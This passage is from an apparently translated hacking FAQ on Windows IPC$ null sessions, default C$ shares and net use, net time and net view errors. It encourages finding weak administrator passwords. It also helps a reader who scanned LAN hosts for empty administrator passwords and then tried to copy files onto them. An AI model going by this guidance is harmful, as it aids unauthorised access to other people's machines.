A: Well, being asked for a password means the user you are currently using does not have enough permission to map C$, which is a default share. Try to raise your permissions or find a weak administrator password! The default shares normally require administrator permissions.
12. I scanned a host with port 139 open using superscan, but why can't I establish a null session with it?
A: You have confused the relationship between IPC$ and port 139. A host that accepts IPC$ connections must have port 139 or port 445 open, but a host with these ports open may still not accept a null session, because the other side can disable IPC$ sharing.
13. Most of the machines on our LAN run XP. I scanned several administrator accounts with streamer and their passwords were empty. I can connect to them, but I cannot copy anything; it says error 5. Why?
A: XP is more secure. In the default security policy settings, a local account authenticating over the network is treated as Guest, so even if you log on remotely as an administrator you only have Guest permissions. Copying a file therefore fails; error 5 means insufficient permission.
14. I used net use \\192.168.0.2\IPC$ "password" /user:"Administrator", but net use I: \\192.168.0.2\c
asks me to enter the password for \\192.168.0.2. How can this be solved? I used the administrator account, so what should I do?
A: Even if you have Administrator permission, the administrator of that machine must have set the share permissions of the C drive share (note: the permissions of an ordinary share can be set, but those of a default share cannot). This problem can occur because the administrator has not granted Administrator access.
15. If IPC$ is disabled on your own machine, can you still use IPC$ to connect to another machine? What if the Server service is disabled?
A: Neither of those two settings should stop you from initiating an IPC$ connection, but it is best to test it yourself.
16. Can you tell me the cause of the following two errors?
C:\> net time \\61.225.*.*
System error 5 has occurred.
Access is denied.
C:\> net view \\61.225.*.*
System error 5 has occurred.
Access is denied.
A: At first I was puzzled by this problem too. Error 5 means insufficient permission, but even the permissions of a null session are enough to complete these two commands, so why couldn't he? Hadn't he established a connection? Later that careless comrade told me that was indeed the case: he had forgotten that he deleted the IPC$ connection, then ran the two commands above and got error 5.
17. What is going on here?
F:\> net time
Could not locate a time-server.
More help is available by typing NET HELPMSG 3912.
A: The answer is very simple: your command is wrong. It should be net time \\IP.
No IP address was entered, so of course the server cannot be found. The view command also needs an IP address, that is, net view \\IP.